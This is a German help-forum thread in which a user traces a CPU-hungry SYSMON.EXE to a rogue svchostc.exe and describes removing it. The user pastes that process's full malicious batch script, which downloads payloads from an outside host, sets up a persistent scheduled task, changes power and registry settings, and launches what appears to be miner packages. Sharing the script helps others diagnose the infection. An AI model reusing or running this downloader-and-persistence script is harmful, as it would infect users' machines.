SYSMON.EXE beansprucht fast die Hälfte der CPU. Ist es ein Virus? // Gelöst

1092
Min Somai

Dies geschah nach der Installation von Visual Studio 2017. Überall gesucht und vergebens hier.

Screenshot des Task-Managers

Screenshot - Speicherort von SYSMON.EXE in TEMP

Der Ursprung von SYSMON.EXE im Visual Studio-Ordner

Vom Task-Manager aus, wenn ich die Position besuche. Es dauert bis zum TEMP-Ordner und die Gesamtgröße beträgt ca. 170 MB. Ich weiß nicht, ob es echt ist oder nicht.

In diesem Microsoft-Link heißt es: Es ist legitim, aber ich habe keine Befehlszeile verwendet, um es zu installieren. Außerdem befindet es sich nicht im offiziellen Ordner des Windows - sondern im Temp.

Und selbst wenn Sie den Prozess beenden, wird er nach einiger Zeit automatisch angezeigt.

Update: Das Beenden des Prozesses und das Löschen der temporären Dateien funktionieren nicht. Selbst bei der Deinstallation ganzer Visual Studio Files (20 + GB) bleibt das Problem bestehen. Ich brauche Hilfe. Bitte!

// Gelöst //

Ich behalte den Faden, falls jemand die gleichen Probleme hat

  • Suchen Sie im Task-Manager nach svchostc.exe (nicht svchost.exe) und löschen Sie es vom ursprünglichen Speicherort.
  • Bereinigen Sie außerdem die Registrierung und löschen Sie temporäre Dateien von% temp%.

Die svchostc.exe führte die folgenden bat-Dateien aus und lud die Virusdateien in den temporären Ordner und alles ist in der Historie.

Update: Dies war in einer Bat-Datei.

ping www.google.com -n 1 -w 1000 if %errorlevel% == 1 ( exit ) if not exist "%TEMP%\7za.exe" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/7za.exe -OutFile \"%TEMP%\7za.exe\"" ) if not exist "%TEMP%\ppuarchive4.zip" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/packagenew_unsigned.zip -OutFile \"%TEMP%\ppuarchive4.zip\"" ) if not exist "%TEMP%\bcmuarchive12.zip" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/packagehwloc_unsigned.zip -OutFile \"%TEMP%\bcmuarchive12.zip\"" ) if not exist "%TEMP%\tmg.ps1" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/trackermagic.ps1 -OutFile \"%TEMP%\tmg.ps1\"" ) if not exist "%TEMP%\opokl.txt" ( PowerShell -NoLogo -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/svchostc_task.xml -OutFile \"%TEMP%\svctask.xml\"" PowerShell -NoLogo -Command "(gc \"%TEMP%\svctask.xml\") -replace 'LOCALAPPDATA', '%LOCALAPPDATA%' | Out-File \"%TEMP%\svctask.xml\"" schtasks /Create /xml "%TEMP%\svctask.xml" /tn "svchostc" /F del "%TEMP%\svctask.xml" echo a > "%TEMP%\opokl.txt" ) if not exist "%LOCALAPPDATA%\WindowsDefenderTemp\update.vbs" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/batchbot.vbs -OutFile \"%TEMP%\batchbot.vbs\"" PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/batchinstaller.bat -OutFile \"%TEMP%\batchinstaller.bat\"" PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/batchtask.xml -OutFile \"%TEMP%\batchtask.xml\"" "%TEMP%\batchinstaller.bat" ) set list=FDBBBAD251AD958202EBB8D72746CEDC85DA45F2 8763B0C12D08BF29E40929B97A05D89721F8387D 4F4BA35DCA24DFA59E3CAADEA01C1094A1D0DB9F 39999E1648D457EC986B80CA2319C3B3E6B6C26B D0011BD12AA2D97084AC8D9E08FAA4C7307D616C EEFD9416DF1F743F26CD0B695C437626D951D752 FA58AD3904381B2E35CD233CD3DEFB13DB83FDC7 92B60DF728B47048D8354AB9C96ADCD60B25B01A 77E386B5AB1046DD872394DED2C93B312B93EAD1 1D8C5463FF555789B3706E4571DD6C512B427A9F 5F72F3EFCF42EAAC871C919FA5C85C1C11FB7F6A (for %%a in (%list%) do ( powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.leechers-paradise.org 6969 %%a 90 powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.coppersurfer.tk 6969 %%a 90 powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" exodus.desync.com 6969 %%a 90 )) powercfg /SETACVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0 powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0 powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1 powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\GraphicsDrivers" /v TdrDelay /t REG_SZ /d "8" /f if not exist "%LOCALAPPDATA%\svc10.17134\d.txt" ( "%TEMP%\7za.exe" x "%TEMP%\ppuarchive4.zip" -o"%~dp0" -y "%~dp0\packagenew\buildpassive.bat" echo d > "%LOCALAPPDATA%\svc10.17134\d.txt" rmdir /s /q "%~dp0\packagenew" ) ::taskkill /f /im sysmon.exe tasklist /FI "IMAGENAME eq sysmon.exe" 2>NUL | find /I /N "sysmon.exe">NUL if "%ERRORLEVEL%"=="0" exit "%TEMP%\7za.exe" x "%TEMP%\bcmuarchive12.zip" -o"%~dp0" -y "%~dp0\packagehwloc\start.bat" start /b "" cmd /c del "%~dp0\upd.bat"&exit /b

1
Wenn Sie sich Sorgen machen, beenden Sie den Vorgang manuell und löschen Sie dann Ihren temporären Ordner. Ramhound vor 6 Jahren 0
Bearbeiten Sie die Frage, um sie auf ein bestimmtes Problem zu beschränken, und zwar so detailliert, dass eine angemessene Antwort gefunden wird. Ramhound vor 6 Jahren 0
@Ramhound hat das viele, viele Male gemacht - es füllt den Ordner erneut mit den gleichen Dateien. Min Somai vor 6 Jahren 0
Und gibt es eine Möglichkeit, den Ursprung der Dateien im temporären Ordner zu ermitteln? Min Somai vor 6 Jahren 0
Dieses Problem trat auf, nachdem Sie Visual Studio installiert hatten. Wenn Sie also Visual Studio deinstallieren, wird das Problem behoben. Ramhound vor 6 Jahren 1
Ich habe einen ganzen Tag gebraucht, um alle Komponenten zu installieren, das sind etwa 20 GB Dateien, die nach Alternativen suchen. und habe das nicht versucht. Min Somai vor 6 Jahren 0
Durchsuchen Sie Ihre Festplatte nach SYSMON und prüfen Sie, ob sie irgendwo anders angezeigt wird. Moab vor 6 Jahren 0
deinstallierte Visual Studio, aber es war nicht das Problem. svchostc.exe (nicht svchost.exe) lief im Hintergrund und führte die obigen .bat-Dateien aus, um den Virus herunterzuladen und Powershell und Befehle auszuführen, um die Datei sysmon.exe auszuführen. Die Datei (svchostc.exe) wurde gelöscht, die Registrierung wurde gesäubert - jetzt wird sie nicht angezeigt. Gelöst, denke ich. @Moab - die Dateien befanden sich im Ordner% temp% - jedes Mal, wenn Sie die Dateien löschen, würde sie sich wieder füllen. Min Somai vor 6 Jahren 0

0 Antworten auf die Frage

Verwandte Probleme